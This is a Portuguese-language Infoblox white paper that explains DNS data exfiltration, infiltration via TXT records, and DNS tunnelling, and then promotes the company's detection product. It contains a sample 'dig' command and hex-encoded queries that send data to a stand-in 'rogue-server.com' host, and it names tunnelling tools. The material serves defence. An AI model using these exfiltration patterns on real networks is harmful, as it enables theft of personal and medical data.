Exfiltração de dados por meio da infraestrutura do DNS do
Transcrição
Exfiltração de dados por meio da infraestrutura do DNS do
INFORME TÉCNICO Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços Fechamento do acesso por back-door a dados confidenciais dos assinantes Apresentação Embora o DNS não tenha mudado muito desde sua invenção por Paul Mockapetris em 1983, os recursos e habilidades dos hackers de hoje avançaram consideravelmente. O DNS é uma rede de sobreposição para roteamento e cache desenvolvida globalmente que conecta redes públicas, corporativas e a Internet. A universalidade de uso e a natureza de código aberto da tecnologia o tornam extremamente vulnerável a ataques de hackers, como os de DDoS, o que gera perguntas importantes. Sua segurança é suficiente? É vulnerável à violação de dados? A resposta é que o DNS pode estar sujeito a todo tipo de uso abusivo, o que o torna a back-door perfeita para hackers que pretendam roubar dados confidenciais. Os provedores de serviços precisam proteger não só seus dados corporativos e de identificação pessoal armazenados em seus bancos de dados, mas também os próprios assinantes e clientes corporativos para que não sejam vítimas de hackers ao fazerem o download não intencional de malware e outras ameaças. Os provedores de serviços hoje entendem que a segurança é altamente valorizada por seus assinantes e que não pode mais ser considerada um simples “item da lista de verificação”, mas sim um diferencial em qualificação e vantagem competitiva. Bloqueando proativamente o acesso a domínios mal-intencionados, identificando dispositivos infectados e mitigando o tunelamento DNS ativo e atividades de exfiltração de dados, os provedores de serviços aumentarão seu valor para os assinantes e garantirão sua satisfação, além de reduzirem o risco de interrupção do serviço. Este documento mostra as táticas usadas pelos hackers para explorar o DNS para tunelamento DNS e exfiltração de dados. Apresenta também o novo recurso exclusivo da Infoblox, o Infoblox DNS Threat Analytics, que usa aprendizado de máquina e faz análise de streaming em tempo real em consultas DNS ativas para detectar e bloquear automaticamente o tunelamento DNS e a exfiltração de dados. Roubar dados – por que e de que tipo? O DNS é cada vez mais usado como caminho para exfiltração de dados, seja por dispositivos infectados por malware ou por funcionários mal-intencionados. Segundo pesquisa recente sobre segurança em DNS, 46% dos participantes enfrentaram exfiltração via DNS e 45% sofreram tunelamento DNS. Em uma pesquisa do Heavy Reading somente sobre provedores de serviços, quase 30% deles sofreram tunelamento DNS semanal ou diário, e até 35% indicaram que tais ataques causaram interrupção dos serviços, com impacto grave ou mesmo catastrófico. O tunelamento DNS inclui com frequência o tunelamento de tráfego de protocolo IP visando à exfiltração de dados. Claramente, o tunelamento DNS e a exfiltração de dados são ameaças importantes às redes dos provedores de serviços e aos assinantes e clientes corporativos. E que tipos de dados podem ser roubados de assinantes e clientes corporativos? Eles variam e podem incluir: • • • • 1 1 Informações de identificação pessoal (PII), como números de RG e CPF Dados regulamentados relacionados à conformidade com o Padrão de Segurança de Dados do Setor de Cartões de Pagamento (PCI DDS) e com a Lei de Portabilidade e Responsabilidade de Seguros de Saúde (HIPAA) Propriedade intelectual que dá à organização uma vantagem competitiva Outras informações confidenciais, como números de cartões de crédito, dados financeiros, folha de pagamento e e-mails de empresas RFC 882 Domain Names - Concepts and Facilities, P. Mockapetris, The Internet Society (novembro de 1987) INFORME TÉCNICO Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços (SP) Funcionários mal-intencionados estabelecem o túnel DNS de dentro da rede ou criptografam e incorporam partes dos dados em consultas DNS. Os dados podem ser descriptografados na outra extremidade e recompostos para que se obtenha as informações valiosas buscadas. As motivações variam de hacktivismo e espionagem até fraudes financeiras em que os dados podem vendidos facilmente e de forma lucrativa no mercado negro. DNS como protocolo de transporte Os provedores de serviços e as empresas utilizam ativamente muitos mecanismos de defesa e tecnologias de segurança, como firewalls de próxima geração, sistemas de detecção e prevenção de invasão (IDSs e IPSs) e gateways de segurança. Sendo assim, como os hackers conseguem usar o DNS para transportar dados atravessando várias camadas de mecanismos de defesa cuidadosamente projetados? A natureza do protocolo DNS, inventado há mais de 30 anos, faz com que ele seja considerado confiável, embora vulnerável a hackers e funcionários mal-intencionados. Para compreender essa vulnerabilidade, é importante entender a natureza das mensagens DNS. Há dois tipos de mensagens DNS, consultas e respostas, e elas têm o mesmo formato. Cada mensagem consiste em cabeçalho e quatro seções: pergunta, resposta, autoridade e adicional. Os “sinalizadores” do campo de cabeçalho controlam o conteúdo dessas quatro seções, mas a estrutura de todas as mensagens DNS é a mesma.2 Vários objetos e parâmetros no DNS têm limites de tamanho. Esses limites são listados abaixo. Alguns podem ser facilmente mudados, e outros são mais fundamentais.3 Identificadores 63 octetos ou menos Nomes 255 octetos ou menos TTL Positivo de um número de 32 bits assinado Mensagens UDP 512 octetos ou menos4 O que isso significa? Os hackers têm como base 512 octetos para “codificar” dados em mensagens UDP para evitar detecção. Eles também podem incorporar informações de sinalização ou codificação leve em alguns dos identificadores ou namespaces e roubá-los. Exfiltração A exfiltração de dados via DNS pode ser feita da seguinte forma: uma string de valor é inserida na seção de nomes (até 255 octetos) ou na seção de mensagens UDP (até 512 octetos), formatada como consulta e enviada a um servidor DNS malicioso que registra a consulta. Os hackers configuram um servidor de nome com registro de consulta habilitado. Esse servidor de nome será o “servidor de captura” dos dados confidenciais que estão sendo roubados. Ele executa uma instalação básica de BIND, é acessível pela Internet e pode ficar oculto até mesmo em um modem a cabo, desde que tenha acesso à porta 53. 2 RFC 1034 Domain Names - Concepts and Facilities, P. Mockapetris, The Internet Society (novembro de 1987) 3 RFC 1034 Domain Names - Concepts and Facilities, P. Mockapetris, The Internet Society (novembro de 1987) 4 RFC 2671 Extension Mechanisms for DNS (EDNS0), que permite maiores tamanhos de pacotes. 2 Digamos que o endereço IP do servidor malicioso seja 192.168.1.25. Um cliente infectado ou relacionado a um funcionário mal-intencionado que esteja tentando roubar dados pode consultar esse servidor malicioso com esta string: >dig @192.168.1.25 my.name.rogue-server.com No syslog do servidor malicioso, é registrada a mensagem a seguir. info client 192.168.1.202#55648 (my.name.rogue-server.com): query: my.name. roque-server.com IN A + (192.168.1.25) Como vemos, embora esse seja um exemplo simples, os dados — que são “my.name” — podem ser facilmente retransmitidos. Os métodos comuns de transmissão real de dados são um pouco mais elaborados. Os hackers usam algoritmos de codificação de dados para movimentar os dados, obscurecendo e às vezes compactando o conteúdo e, frequentemente, desmembrando-os de forma aleatória. Por exemplo, as consultas podem ter este aspecto: 0a55504b01021503140008000800.rogue-server.com 104b68426c86ad7391000000de000000.rogue-server.com 1c000c0000000000000000.rogue-server.com 40a481764a31005f5f4d.rogue-server.com 41434f53582f426561.rogue-server.com Nesse exemplo, temos binário convertido em HEX para transmissão e remontagem na extremidade de destino. Os dados reais podem ser registros médicos, números de RG ou CPF, datas de nascimento ou outro tipo de informação confidencial. É claro que os criminosos cibernéticos podem usar outros métodos mais inteligentes, como marcação de ID, numeração sequencial, etc. Isso é especialmente útil para marcar transações (como compras com cartão de crédito), em que a sequência de eventos pode informar quais bits são nomes, números ou códigos de segurança de cartões (CVV). Isso acontece principalmente no caso do malware FrameWorkPOS. Como milhares de consultas DNS em potencial saem de uma rede como parte de uma tentativa de exfiltração, pode parecer simples identificar um método de transporte desse tipo, mas os ladrões sabem muito bem como evitar a detecção. Eles usam métodos como “slow drip” (gotejamento lento), que envia consultas em velocidade baixa e controlada para que a taxa de transmissão não suba rapidamente e dispare alertas. Outro método usado é falsificação de IP de origem, em que o IP de origem é reescrito nas consultas para que pareça que elas vêm de muitos clientes diferentes. Uma segurança de rede correta deveria detectar essa prática na porta de switch, mas você ficaria surpreso com a frequência de sucesso dessa técnica! 3 INFORME TÉCNICO Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços (SP) Servidor controlado por invasores rogue-server.com (C&C) NameMarySmith.rogue-server.com MRN100045429886.rogue-server.com DOB10191952.rogue-server.com Comandos C&C Dados INTERNET EMPRESA Servidor DNS NameMarySmith.rogue-server.com MRN100045429886.rogue-server.com DOB10191952.rogue-server.com Endpoint infectado Nome Mary Smith MRN 100045429886 DOB 10191952 Médica clínica geral Sally Vanderbilt, Acompanhamento de diabetes e doenças cardíacas Figura 1: Consultas de exfiltração de dados via DNS Infiltração Vimos como pode ocorrer o vazamento de dados, mas que tal usar o DNS para mover dados para dentro de uma rede? Os hackers podem usar o DNS para mover conteúdo ou entrar sorrateiramente usando código mal-intencionado. É mais fácil do que você pensa. Usando um método semelhante à exfiltração, o hacker pode preparar um código binário para transporte codificando-o (talvez como HEX) e carregá-lo em registros TXT em seu servidor malicioso. Mas como o hacker consegue passar por firewalls, IDSs e filtros de conteúdo? Ele pode retirá-lo da linha de comando ou escrever algum código de navegador para armazená-lo em um blob e depois despejar em um arquivo. Também pode apenas injetá-lo usando DNS dinâmico no servidor DNS, onde pode acessar o código usando navegadores, aplicativos de telefone ou phishing. Com meios como “onclick” ou “exploit”, o código é baixado do DNS e montado por um cliente. Agora que os hackers podem enviar e receber dados via DNS, o conceito de DNS como protocolo de transporte secreto fica claro. 4 Tunelamento DNS Quanto às redes de provedores de serviços, o uso mais comum de tunelamento DNS é ignorar os mecanismos de segurança e faturamento para acessar serviços de primeira linha, como Wi-Fi. Mas qualquer tipo de dado pode sofrer tunelamento (SSH ou HTTP) em modo DNS, criptografado e compactado, para tristeza de administradores de rede e equipes de segurança. O tunelamento DNS existe há muito tempo. Há vários aplicativos de tunelamento muito conhecidos, como o Iodine, considerado “padrão ouro”, o OzymanDNS, SplitBrain, DNS2TCP, TCP-over-DNS e outros. Há também concorrentes mais recentes que permitem tunelamento em velocidade muito mais alta e oferecem muitos recursos. Até mesmo alguns serviços comerciais começaram a oferecer serviço de Rede privada virtual (VPN) em DNS, permitindo que os assinantes ignorem muitos controles de segurança de Wi-Fi. Grande parte dessas ferramentas têm assinaturas específicas que podem ser usadas para detecção e mitigação. Proteção Infoblox contra exfiltração de dados via DNS Infoblox DNS Threat Analytics Algumas soluções de segurança afirmam oferecer proteção ao DNS, mas na verdade essa proteção é limitada. O Infoblox DNS Threat Analytics é uma nova tecnologia que detecta e bloqueia automaticamente tentativas de roubo de propriedade intelectual via DNS sem a necessidade de agentes de endpoint ou infraestrutura de rede adicional. Ele usa análise de streaming de consultas DNS ativas em tempo real e aprendizado de máquina para detectar com precisão a presença de dados em consultas DNS. Disponível como módulo adicional com o Infoblox DNS Firewall, parte das soluções DNS Seguro para provedores de serviços, o Infoblox DNS Threat Analytics protege contra técnicas sofisticadas de exfiltração de dados e kits de ferramentas de tunelamento prontos para uso. A Infoblox é o primeiro fornecedor a oferecer uma solução de infraestrutura do DNS com análise integrada para detectar e bloquear tunelamento DNS e exfiltração de dados. Entropia Tamanho Modelo analítico Frequência Léxica N-gram Figura 2: Modelo analítico 5 INFORME TÉCNICO Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços (SP) • • • • Bloqueio ativo de exfiltração de dados: O DNS Threat Analytics detecta e bloqueia automaticamente as comunicações para destinos associados a tentativas de exfiltração de dados. O mecanismo adiciona automaticamente destinos associados à exfiltração de dados à lista negra do Infoblox DNS Firewall. Além disso, são enviadas atualizações em todo o Grid a todos os membros Infoblox com recursos de firewall DNS/RPZ para estender a aplicação a todas as partes da rede de exfiltração, mesmo aquelas sem assinaturas padrão, com base em comportamento de consultas e padrões. Tecnologia exclusiva: O Infoblox DNS Threat Analytics é uma tecnologia exclusiva que usa aprendizado de máquina para análise de streaming em tempo real em consultas DNS ativas para detectar exfiltração de dados. O mecanismo de análise examina host.subdomínio e registros TXT em consultas DNS e usa entropia, análise léxica e série temporal para determinar a presença de dados em consultas. Isso maximiza as chances de detecção de novos métodos de exfiltração, mesmo aqueles sem assinaturas padrão, com base em comportamento de consultas e padrões. Sem infraestrutura ou agentes adicionais: Ao contrário de outras abordagens que analisam dados de log em lotes e após o estrago já ter sido feito, o DNS Threat Analytics é integrado diretamente à infraestrutura do DNS que está no caminho de exfiltração e, por isso, faz a detecção em tempo real, sem necessidade de infraestrutura de rede adicional. Visibilidade: A Infoblox proporciona visibilidade sobre dispositivos infectados ou possíveis funcionários desonestos fornecendo informações detalhadas como tipo do dispositivo, endereço IP e MAC e, o mais importante, indica o usuário associado ao dispositivo que está tentando exfiltrar dados. Isso reduz o tempo de reparo e acelera o processo de mitigação. Detecção de tunelamento DNS com base em assinatura: Infoblox Advanced DNS Protection para provedores de serviços Além da detecção de exfiltração de dados via DNS em consultas com base em comportamento, o Infoblox Advanced DNS Protection para provedores de serviços tem várias regras de proteção contra ameaças capazes de detectar kits de ferramentas de tunelamento DNS comuns e pacotes de malware como o Iodine. Essa detecção baseia-se nas conhecidas assinaturas de kits de ferramentas de tunelamento padrão que podem estar sendo usadas por clientes infectados ou funcionários desonestos e permite o bloqueio imediato e ilimitado de tentativas de tunelamento. Soluções de prevenção contra perda de dados Grande parte das soluções de prevenção contra perda de dados (DLP) protege contra o vazamento de dados por e-mail, web, ftp e outros vetores monitorando dados em repouso, em movimento e em uso. Entretanto, elas não alcançam a exfiltração baseada em DNS. O Infoblox DNS Threat Analytics complementa as soluções de DLP tradicionais, impedindo que o DNS seja usado como back-door para o roubo de dados. O modo mais eficaz de atacar a exfiltração de dados com base em DNS é ter recursos de detecção inteligentes integrados diretamente à infraestrutura do DNS. Automatização da resposta a ameaças por meio de integrações Embora a detecção e o bloqueio de tentativas de exfiltração de dados seja fundamental, também é importante garantir a rápida correção de dispositivos infectados. Isso pode ser feito com a integração mais estreita entre as tecnologias de detecção e as soluções de correção de endpoint. O Infoblox integra-se a soluções líderes de correção de endpoint como Bit 9 + Carbon Black para fornecer indicadores de invasão quando um endpoint está tentando exfiltrar dados. Usando essa inteligência, o Carbon Black impede automaticamente a execução e a conexão dos processos mal-intencionados, coloca efetivamente o endpoint infectado em quarentena e impede a exfiltração de dados, mesmo que esse dispositivo esteja fora da empresa. 6 Além disso, o Infoblox troca informações valiosas sobre eventos de rede e de segurança com o Cisco Identity Services Engine (ISE) para automatizar a resposta e a velocidade da segurança. O Infoblox envia um “alerta precoce” de dispositivos invadidos (tentando exfiltrar dados) ao Cisco ISE usando o Cisco pxGrid. Essas informações podem, então, ser enviadas à arquitetura de segurança da organização para os procedimentos de quarentena. Por fim, o Infoblox integra-se automaticamente às tecnologias SIEM ou a soluções de análise de comportamento de usuário criadas internamente usando APIs para fornecer dados contextuais valiosos como tipo de SO, informações sobre usuários e concessão de DHCP de dispositivos infectados, sem a necessidade de agentes de endpoint. Resumo O roubo de dados é um dos riscos mais sérios enfrentados por assinantes e clientes corporativos de um provedor de serviços. O DNS frequentemente é usado como caminho de exfiltração de dados, pois não é verificado pelos controles de segurança comuns. A tecnologia Infoblox DNS Threat Analytics pode proteger contra as mais sofisticadas técnicas de exfiltração de dados. O DNS está perto dos endpoints, é ubíquo e pode ser usado com eficácia para aprimorar a postura de segurança da organização. Sobre a Infoblox A Infoblox fornece serviços de rede essenciais para proteger a infraestrutura do DNS (Domain Name System), automatizar implantações na nuvem e aumentar a confiabilidade de redes empresariais e de provedores de serviços no mundo inteiro. Como líder do setor de DNS, DHCP e gerenciamento de endereço IP, categoria conhecida como DDI, a Infoblox (www.infoblox.com.br) reduz os riscos e a complexidade das redes. 7 INFORME TÉCNICO Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços (SP) MATRIZES DA EMPRESA: +1.408.986.4000 +1.866.463.6256 (ligue gratuitamente dos EUA e Canadá) [email protected] www.infoblox.com.br/cloud MATRIZ EMEA: +32.3.259.04.30 [email protected] MATRIZ APAC: +852.3793.3428 [email protected] © 2015 Infoblox Inc. Todos os direitos reservados. Infoblox-WP-0111-00 Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços - Dez 2015